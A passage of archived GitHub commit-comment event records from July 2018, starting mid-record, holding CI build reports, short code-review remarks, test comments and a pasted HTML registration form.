[logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 252s | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1242s | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 493s | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 247s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 578s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 517s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 220s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 338s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 354s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 248s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-10T02:05:40Z"}
{"id":"7941046528","type":"CommitCommentEvent","actor":{"login":"gomker"},"repo":{"name":"gomker/BDArmory"},"payload":{"comment":{"id":29650156,"position":null,"line":null,"path":null,"commit_id":"0724bb41978455eb48123ab54db8da54f7cee685","created_at":"2018-07-10T02:07:22Z","updated_at":"2018-07-10T02:07:22Z","author_association":"OWNER","body":"Issue #531"}},"created_at":"2018-07-10T02:07:22Z"}
{"id":"7941050406","type":"CommitCommentEvent","actor":{"login":"fuqmy72"},"repo":{"name":"fuqmy72/gitTest"},"payload":{"comment":{"id":29650165,"position":7,"line":7,"path":"GitTest/src/HelloGit.java","commit_id":"cbbbbe003fba75e1afbedf9f7d808a295534119c","created_at":"2018-07-10T02:08:51Z","updated_at":"2018-07-10T02:08:51Z","author_association":"OWNER","body":"11"}},"created_at":"2018-07-10T02:08:51Z"}
{"id":"7941052201","type":"CommitCommentEvent","actor":{"login":"joshsmoore"},"repo":{"name":"resumecompanion/grape_logging"},"payload":{"comment":{"id":29650169,"position":null,"line":null,"path":null,"commit_id":"da4933b8ed6437944a6060a27c1c7bf785d87adc","created_at":"2018-07-10T02:09:36Z","updated_at":"2018-07-10T02:09:36Z","author_association":"NONE","body":"@alan2112000 why not just sterilize into JSON?"}},"created_at":"2018-07-10T02:09:36Z"}
{"id":"7941055913","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29650175,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-10T02:11:03Z","updated_at":"2018-07-10T02:11:03Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2311 of 2311 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-10T02:11:03Z"}
{"id":"7941058212","type":"CommitCommentEvent","actor":{"login":"avinashraja98"},"repo":{"name":"mariusmotea/diyHue"},"payload":{"comment":{"id":29650180,"position":null,"line":null,"path":null,"commit_id":"b635eaaf2fa1cf0c643fdf4365f7cf876363cb17","created_at":"2018-07-10T02:11:56Z","updated_at":"2018-07-10T02:11:56Z","author_association":"CONTRIBUTOR","body":"Possible typo in line 77? "}},"created_at":"2018-07-10T02:11:56Z"}
{"id":"7941059134","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29650181,"position":null,"line":null,"path":null,"commit_id":"fd2b49a2c5cdcb321d768f0429ecc2225faef185","created_at":"2018-07-10T02:12:19Z","updated_at":"2018-07-10T02:12:19Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.210`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/210) :tada:"}},"created_at":"2018-07-10T02:12:19Z"}
{"id":"7941060291","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29650182,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-10T02:12:46Z","updated_at":"2018-07-10T02:12:46Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T02:12:46Z"}
{"id":"7941062127","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29650184,"position":null,"line":null,"path":null,"commit_id":"fd2b49a2c5cdcb321d768f0429ecc2225faef185","created_at":"2018-07-10T02:13:28Z","updated_at":"2018-07-10T02:13:28Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.318`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/402031453) :tada:"}},"created_at":"2018-07-10T02:13:28Z"}
{"id":"7941064475","type":"CommitCommentEvent","actor":{"login":"Andrew5c"},"repo":{"name":"Andrew5c/my"},"payload":{"comment":{"id":29650187,"position":null,"line":null,"path":null,"commit_id":"51fb0b6bb0dabbf1da1e59d83ac8d17799ebcaba","created_at":"2018-07-10T02:14:25Z","updated_at":"2018-07-10T02:14:25Z","author_association":"OWNER","body":"test for modiy"}},"created_at":"2018-07-10T02:14:25Z"}
{"id":"7941067363","type":"CommitCommentEvent","actor":{"login":"renxiaoxue870"},"repo":{"name":"renxiaoxue870/hello-world"},"payload":{"comment":{"id":29650196,"position":null,"line":null,"path":null,"commit_id":"3f892e2c804593cdffeff3a955ca07645c68dd7b","created_at":"2018-07-10T02:15:29Z","updated_at":"2018-07-10T02:15:29Z","author_association":"OWNER","body":"这是备注"}},"created_at":"2018-07-10T02:15:29Z"}
{"id":"7941068824","type":"CommitCommentEvent","actor":{"login":"alexandrescosta"},"repo":{"name":"alexandrescosta/atividadecadastro"},"payload":{"comment":{"id":29650197,"position":null,"line":null,"path":null,"commit_id":"1f997dc831f9dfb790373e3cb82f934a497f5fdd","created_at":"2018-07-10T02:16:01Z","updated_at":"2018-07-10T02:16:01Z","author_association":"OWNER","body":"<!DOCTYPE html>\r\n<html>\r\n<head>\r\n\t<title>CADASTRO</title>\r\n\t<style>\r\nfieldset {\r\n    border: 0;}\r\nbody, input, select, textarea, button {\r\n    font-family: sans-serif;\r\n    font-size: 1em;}\r\n\t.campo label {\r\n    margin-bottom: 0.1em;\r\n    color: #667;\r\n    display: block;}\r\nfieldset.grupo .campo {\r\n    float:  left;\r\n    margin-right: 1em;}\r\n\t.campo input[type=\"text\"],\r\n\t.campo textarea {\r\n    padding: 0.2em;\r\n    border: 1px solid #CCC;\r\n    box-shadow: 2px 2px 2px rgba(0,0,0,0.2);\r\n    display: block;}\r\n\r\n.botao {\r\n    font-size: 1.5em;\r\n    background: mediumblue;\r\n    border: 0;\r\n    margin-bottom: 1em;\r\n    color: #FFF;\r\n    padding: 0.2em 0.6em;\r\n    box-shadow: 2px 2px 2px rgba(0,0,0,0.2);\r\n    text-shadow: 1px 1px 1px rgba(0,0,0,0.5);\r\n}\r\n\r\n.botao, select, label.checkbox {\r\n    cursor: pointer;\r\n}\r\n</style>\r\n</head>\r\n<body>\r\n<form action=\"#\" method=\"post\">\r\n    <fieldset>\r\n        <fieldset class=\"grupo\">\r\n            <div class=\"campo\">\r\n                <label for=\"CADASTRO\">CADASTRO</label>\r\n            </div>\r\n        </fieldset>    \t\r\n        <fieldset class=\"grupo\">\r\n            <div class=\"campo\">\r\n                <label for=\"nome\">Nome</label>\r\n                <input type=\"text\" id=\"nome\" name=\"nome\" style=\"width: 30em\" value=\"\">\r\n            </div>\r\n        </fieldset>\r\n        <fieldset class=\"grupo\">\r\n        \t<div class=\"campo\">\r\n            \t<label>Sexo</label>\r\n            \t<label>\r\n                \t<input type=\"radio\" name=\"sexo\" value=\"masculino\"> Masculino\r\n            \t</label>\r\n            \t<label>\r\n                \t<input type=\"radio\" name=\"sexo\" value=\"feminino\"> Feminino\r\n            \t</label>\r\n        \t</div>\r\n    \t</fieldset>\r\n        <fieldset class=\"grupo\">\r\n        \t<div class=\"campo\">\r\n            \t<label for=\"email\">E-mail</label>\r\n            \t<input type=\"text\" id=\"email\" name=\"email\" style=\"width: 20em\" value=\"\">\r\n        \t</div>\r\n    \t</fieldset>\r\n        <fieldset class=\"grupo\">\r\n        \t<div class=\"campo\">\r\n            \t<label for=\"telefone\">Telefone</label>\r\n            \t<input type=\"text\" id=\"telefone\" name=\"telefone\" style=\"width: 10em\" value=\"\">\r\n        \t</div>\r\n        </fieldset>\r\n        <fieldset class=\"grupo\">\r\n        \t<div class=\"campo\">\r\n        \t\t<label for=\"Rua\">Endereço - Rua:</label>\r\n                <input type=\"text\" id=\"Rua\" name=\"Rua\" style=\"width: 30em\" value=\"\">\r\n\t\t\t</div>\r\n        \t<div class=\"campo\">\r\n        \t\t<label for=\"Num\">Num.</label>\r\n                <input type=\"text\" id=\"Num\" name=\"Num\" style=\"width: 5em\" value=\"\">\r\n            </div>\r\n        </fieldset>\r\n        <fieldset class=\"grupo\">\r\n        \t<div class=\"campo\">\r\n                <label for=\"cidade\">Cidade</label>\r\n                <input type=\"text\" id=\"cidade\" name=\"cidade\" style=\"width: 15em\" value=\"\">\r\n        \t</div>\r\n            <div class=\"campo\">\r\n                <label for=\"estado\">Estado</label>\r\n                <select name=\"estado\" id=\"estado\">\r\n                    <option value=\"\">--</option>\r\n                    <option value=\"PR\">PR</option>\r\n                    <option value=\"PR\">AC</option>\r\n                    <option value=\"PR\">AL</option>\r\n                    <option value=\"PR\">AP</option>\r\n                    <option value=\"PR\">AM</option>\r\n                    <option value=\"PR\">BA</option>\r\n                    <option value=\"PR\">CE</option>\r\n                    <option value=\"PR\">DF</option>\r\n                    <option value=\"PR\">ES</option>\r\n                    <option value=\"PR\">GO</option>\r\n                    <option value=\"PR\">MA</option>\r\n                    <option value=\"PR\">MT</option>\r\n                    <option value=\"PR\">MS</option>\r\n                    <option value=\"PR\">MG</option>\r\n                    <option value=\"PR\">PA</option>\r\n                    <option value=\"PR\">PB</option>\r\n                    <option value=\"PR\">PE</option>\r\n                    <option value=\"PR\">PI</option>\r\n                    <option value=\"PR\">RJ</option>\r\n                    <option value=\"PR\">RN</option>\r\n                    <option value=\"PR\">MS</option>\r\n                    <option value=\"PR\">RO</option>\r\n                    <option value=\"PR\">RR</option>\r\n                    <option value=\"PR\">SC</option>\r\n                    <option value=\"PR\">SP</option>\r\n                    <option value=\"PR\">SE</option>\r\n                    <option value=\"PR\">TO</option>\r\n                </select>\r\n            </div>\r\n        </fieldset>\r\n        <button class=\"botao submit\" type=\"submit\" name=\"submit\">Enviar</button>\r\n    </fieldset>\r\n</form>\r\n</body>\r\n</html>"}},"created_at":"2018-07-10T02:16:01Z"}
{"id":"7941074933","type":"CommitCommentEvent","actor":{"login":"jmmccasland"},"repo":{"name":"shouldergiant/prototypal-ember"},"payload":{"comment":{"id":29650208,"position":12,"line":13,"path":"app/templates/components/nav-bar.hbs","commit_id":"33423e62b8034c04a85eefffba452f5c578ddd62","created_at":"2018-07-10T02:18:17Z","updated_at":"2018-07-10T02:18:17Z","author_association":"COLLABORATOR","body":"@shouldergiant something about this commit has botched the active class styles expected on the current page's link-to. \r\n\r\n<img width=\"1680\" alt=\"screen shot 2018-07-09 at 9 17 01 pm\" src=\"https://user-images.githubusercontent.com/6935786/42485523-8fc9db4a-83bd-11e8-8950-aa74cb586fdb.png\">\r\n"}},"created_at":"2018-07-10T02:18:17Z"}
{"id":"7941082251","type":"CommitCommentEvent","actor":{"login":"ss1102175333"},"repo":{"name":"ServiceStack/redis-windows"},"payload":{"comment":{"id":29650218,"position":null,"line":null,"path":null,"commit_id":"b6eeaf0a45467fff5b78aaf188760608f2e1fee5","created_at":"2018-07-10T02:20:57Z","updated_at":"2018-07-10T02:20:57Z","author_association":"NONE","body":"2"}},"created_at":"2018-07-10T02:20:57Z"}
{"id":"7941085336","type":"CommitCommentEvent","actor":{"login":"weakiwi"},"repo":{"name":"weakiwi/ArchiSteamFarm"},"payload":{"comment":{"id":29650220,"position":3,"line":3,"path":"ArchiSteamFarm/out-win-x64/config/weakiwi.json","commit_id":"fa7d1bcce582cb192150aaf6867a0e1b546c0d9e","created_at":"2018-07-10T02:22:08Z","updated_at":"2018-07-10T02:22:08Z","author_association":"OWNER","body":"thx, I just remoe it"}},"created_at":"2018-07-10T02:22:08Z"}
{"id":"7941086026","type":"CommitCommentEvent","actor":{"login":"gfgtdf"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29650223,"position":null,"line":null,"path":null,"commit_id":"459fd5f8e906f458ff22bb9e10f203d7394b5222","created_at":"2018-07-10T02:22:24Z","updated_at":"2018-07-10T02:22:24Z","author_association":"CONTRIBUTOR","body":"no this would do something very differnt, it would copy the mp_join_game object. The way labdas basicially works is is as a shortcut for normal function objects, meaning this code \r\n\r\n```\r\nint a; \r\nint b;\r\nauto c=[a,&b](int c){ return a+b+c;}\r\n\r\n```\r\n\r\nis basicially equivalent to \r\n\r\n```\r\nint a; \r\nint b;\r\nstruct anon_function_type_1\r\n{\r\n  int a_;\r\n  int& b_;\r\n  auto operator()(int c) { return a_ + b_ + c;}\r\n};\r\nauto c = anon_function_type_1{a_, b_};\r\n```\r\n\r\nchanging it to 'this-by-copy' would be equivalent to changing the type of the memper varible of the functionstruct from `mp_join_game *` to `mp_join_game` but acessing freed mamory is still ub no matter whether its of type `mp_join_game *` or `mp_join_game`\r\n\r\n\r\n"}},"created_at":"2018-07-10T02:22:24Z"}
{"id":"7941102863","type":"CommitCommentEvent","actor":{"login":"quiquefiorenza"},"repo":{"name":"quiquefiorenza/hello"},"payload":{"comment":{"id":29650248,"position":null,"line":null,"path":null,"commit_id":"ed1fc4e01bb5cd09a57c61306f3e3a6b2f2fbb03","created_at":"2018-07-10T02:28:44Z","updated_at":"2018-07-10T02:28:44Z","author_association":"OWNER","body":"Segundo comentaio"}},"created_at":"2018-07-10T02:28:44Z"}
{"id":"7941109027","type":"CommitCommentEvent","actor":{"login":"IsSwm"},"repo":{"name":"encode/django-rest-framework"},"payload":{"comment":{"id":29650265,"position":null,"line":null,"path":null,"commit_id":"e5781440fa6ccff09abc6e0566bdfdd9b84a80a1","created_at":"2018-07-10T02:30:57Z","updated_at":"2018-07-10T02:30:57Z","author_association":"NONE","body":"await"}},"created_at":"2018-07-10T02:30:57Z"}
{"id":"7941112884","type":"CommitCommentEvent","actor":{"login":"shimarin"},"repo":{"name":"esp8266/Arduino"},"payload":{"comment":{"id":29650270,"position":202,"line":202,"path":"cores/esp8266/core_esp8266_waveform.c","commit_id":"ebda795f34e6d09f5676782f0917ad298d9a9cdd","created_at":"2018-07-10T02:32:21Z","updated_at":"2018-07-10T02:32:21Z","author_association":"NONE","body":"could this be like below?\r\n\r\n```\r\nif ((((pin == 16) && waveform[i].gpio16Mask) || ((pin != 16) && (waveform[i].gpioMask == 1<<pin)))  && waveform[i].enabled) {\r\n```\r\n\r\nwithout ```waveform[i].enabled``` condition,  unnecessary(if I haven't mistaken) de-initialization code runs a lot of time.\r\nas digitalRead() invokes this function everytime,  it is harmful for software serial which communicates in higher speed like 115200bps."}},"created_at":"2018-07-10T02:32:21Z"}
{"id":"7941120624","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"PresentKim/DustBin-PMMP"},"payload":{"comment":{"id":29650279,"position":null,"line":null,"path":null,"commit_id":"930bf95b9b3b272dfbbe78c7a3587fd15539a627","created_at":"2018-07-10T02:35:18Z","updated_at":"2018-07-10T02:35:18Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user PresentKim,\nwho has created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/PresentKim/DustBin-PMMP/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `e1171fb8-83e9-11e8-989b-6d836df2e137`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T02:35:18Z"}
{"id":"7941121043","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"PresentKim/HotBox-PMMP"},"payload":{"comment":{"id":29650281,"position":null,"line":null,"path":null,"commit_id":"a367a47aea5f61a2cd593556b75e50a20f8e4567","created_at":"2018-07-10T02:35:28Z","updated_at":"2018-07-10T02:35:28Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user PresentKim,\nwho has created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/PresentKim/HotBox-PMMP/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `e71107c6-83e9-11e8-8153-6bd21012dc2f`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T02:35:28Z"}
{"id":"7941124225","type":"CommitCommentEvent","actor":{"login":"vascosrvbr"},"repo":{"name":"StevenBlack/hosts"},"payload":{"comment":{"id":29650284,"position":null,"line":null,"path":null,"commit_id":"8a1a4ad77faa001786f2b3434b0307d5acdd93c7","created_at":"2018-07-10T02:36:39Z","updated_at":"2018-07-10T02:36:39Z","author_association":"NONE","body":"\"0.0.0.0 thepiratebay.org\" Why is TPB blocked ? it never been before."}},"created_at":"2018-07-10T02:36:39Z"}
{"id":"7941125755","type":"CommitCommentEvent","actor":{"login":"sheenalin"},"repo":{"name":"lovrot/misc-examples-pam50"},"payload":{"comment":{"id":29650287,"position":34,"line":20,"path":"munge/02-A-munge-mainz.R","commit_id":"8c9d456eeb41c0d19047ba1ae5fd4011f6063ba2","created_at":"2018-07-10T02:37:14Z","updated_at":"2018-07-10T02:37:14Z","author_association":"NONE","body":"Hi John,\n\nThank you very much. I've replied under the issue.\n\nSincerely,\n\nSheena\n\n\n2018-07-09 20:51 GMT+08:00 John Lövrot <notifications@github.com>:\n\n> I opened an issue, see #1 (comment)\n> <https://github.com/lovrot/misc-examples-pam50/issues/1#issuecomment-403467525>\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/lovrot/misc-examples-pam50/commit/8c9d456eeb41c0d19047ba1ae5fd4011f6063ba2#commitcomment-29641268>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AlGK3vS8V2brxbtWK477QyGQFOH5iswSks5uE1HTgaJpZM4VHMJt>\n> .\n>\n"}},"created_at":"2018-07-10T02:37:14Z"}
{"id":"7941127757","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29650296,"position":null,"line":null,"path":null,"commit_id":"e1e143b268adcad1c389fff13033a2b4338c3b32","created_at":"2018-07-10T02:37:59Z","updated_at":"2018-07-10T02:37:59Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-22](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-22).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-22-tre.pantheonsite.io/)"}},"created_at":"2018-07-10T02:37:59Z"}
{"id":"7941131376","type":"CommitCommentEvent","actor":{"login":"daeiouabc"},"repo":{"name":"daeiouabc/sivel2_frontend"},"payload":{"comment":{"id":29650305,"position":null,"line":null,"path":null,"commit_id":"5b1308b4c48979545eeae19fcd0e9cd0621e6c36","created_at":"2018-07-10T02:39:18Z","updated_at":"2018-07-10T02:39:18Z","author_association":"OWNER","body":"@rizotas "}},"created_at":"2018-07-10T02:39:18Z"}
{"id":"7941135276","type":"CommitCommentEvent","actor":{"login":"jmmccasland"},"repo":{"name":"shouldergiant/prototypal-ember"},"payload":{"comment":{"id":29650312,"position":5,"line":31,"path":"app/components/contact-modal.js","commit_id":"61f52cb8bbd99900d2b12c6a5d4cb16baf747be4","created_at":"2018-07-10T02:40:47Z","updated_at":"2018-07-10T02:40:47Z","author_association":"COLLABORATOR","body":"@shouldergiant nice catch here!"}},"created_at":"2018-07-10T02:40:47Z"}
{"id":"7941136110","type":"CommitCommentEvent","actor":{"login":"guiKailu"},"repo":{"name":"guiKailu/guiKailu.github.io"},"payload":{"comment":{"id":29650314,"position":null,"line":null,"path":null,"commit_id":"028145dbb07cab17194b266d6d2624c0d456cb35","created_at":"2018-07-10T02:41:06Z","updated_at":"2018-07-10T02:41:06Z","author_association":"OWNER","body":"Increasing the font-size of the body by 20px for an iphone8 media query greatly improved the look on my iphone8! Next step is to fix the headers."}},"created_at":"2018-07-10T02:41:06Z"}
{"id":"7941142048","type":"CommitCommentEvent","actor":{"login":"earlephilhower"},"repo":{"name":"esp8266/Arduino"},"payload":{"comment":{"id":29650327,"position":202,"line":202,"path":"cores/esp8266/core_esp8266_waveform.c","commit_id":"ebda795f34e6d09f5676782f0917ad298d9a9cdd","created_at":"2018-07-10T02:43:22Z","updated_at":"2018-07-10T02:43:22Z","author_association":"COLLABORATOR","body":"Absolutely it could be!  Would you like to put in a PR?  It should also be safe to remove the stopWaveform() call from `digitalRead` as it seems like a programming error to be reading a pin you're running a waveform on."}},"created_at":"2018-07-10T02:43:22Z"}
{"id":"7941151057","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29650347,"position":null,"line":null,"path":null,"commit_id":"451567ba4aa361444b5ec5c4a0f0014b109df0bc","created_at":"2018-07-10T02:46:44Z","updated_at":"2018-07-10T02:46:44Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-24](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-24).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-24-tre.pantheonsite.io/)"}},"created_at":"2018-07-10T02:46:44Z"}
{"id":"7941152305","type":"CommitCommentEvent","actor":{"login":"oylbin"},"repo":{"name":"NDHWAlliance/gitlab-analytics"},"payload":{"comment":{"id":29650351,"position":null,"line":null,"path":null,"commit_id":"1de0609038fb48876c06778e21c05fa3b61ae15c","created_at":"2018-07-10T02:47:13Z","updated_at":"2018-07-10T02:47:13Z","author_association":"NONE","body":"现在是在项目的`mysql/conf/custom.cnf `里配置了使用中国时区。\r\n\r\n这么做，是为了解决grafana和mysql时区一致性的问题\r\n* grafana里选的时间区间现在是按照localtime来的。\r\n* mysql的时间相关的函数，需要能够正确的把 datetime 转换为 localtime。\r\n* 两边不一致的话，数据就会差几个小时。\r\n\r\n不过这个感觉是个坑。用户不一定在中国时区。"}},"created_at":"2018-07-10T02:47:13Z"}
{"id":"7941156633","type":"CommitCommentEvent","actor":{"login":"jmmccasland"},"repo":{"name":"shouldergiant/prototypal-ember"},"payload":{"comment":{"id":29650355,"position":null,"line":null,"path":null,"commit_id":"61f52cb8bbd99900d2b12c6a5d4cb16baf747be4","created_at":"2018-07-10T02:48:50Z","updated_at":"2018-07-10T02:48:50Z","author_association":"COLLABORATOR","body":"@shouldergiant \r\n\r\ngood work on this one!"}},"created_at":"2018-07-10T02:48:50Z"}
{"id":"7941169328","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"PresentKim/WriteCheck-PMMP"},"payload":{"comment":{"id":29650376,"position":null,"line":null,"path":null,"commit_id":"f8b148df33b1bb8bf506e1c2df5a9a3ea629db6c","created_at":"2018-07-10T02:53:40Z","updated_at":"2018-07-10T02:53:40Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user PresentKim,\nwho has created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/PresentKim/WriteCheck-PMMP/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `720d3d5c-83ec-11e8-8ef0-7ee90eb9259b`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T02:53:40Z"}
{"id":"7941171640","type":"CommitCommentEvent","actor":{"login":"brount"},"repo":{"name":"brount/gitTest"},"payload":{"comment":{"id":29650381,"position":null,"line":null,"path":null,"commit_id":"5aed754943de0a881167ef48b787cc960e83246d","created_at":"2018-07-10T02:54:37Z","updated_at":"2018-07-10T02:54:37Z","author_association":"OWNER","body":"아니 이게모야"}},"created_at":"2018-07-10T02:54:37Z"}
{"id":"7941171965","type":"CommitCommentEvent","actor":{"login":"brount"},"repo":{"name":"brount/gitTest"},"payload":{"comment":{"id":29650382,"position":null,"line":null,"path":null,"commit_id":"5aed754943de0a881167ef48b787cc960e83246d","created_at":"2018-07-10T02:54:45Z","updated_at":"2018-07-10T02:54:45Z","author_association":"OWNER","body":"제대로 안해?"}},"created_at":"2018-07-10T02:54:45Z"}
{"id":"7941175542","type":"CommitCommentEvent","actor":{"login":"tookilos"},"repo":{"name":"tookilos/hello-word"},"payload":{"comment":{"id":29650395,"position":null,"line":null,"path":null,"commit_id":"dbc5c093dc3eab1e83c32e366ff689732e11c031","created_at":"2018-07-10T02:56:08Z","updated_at":"2018-07-10T02:56:08Z","author_association":"OWNER","body":"hello i love it"}},"created_at":"2018-07-10T02:56:08Z"}
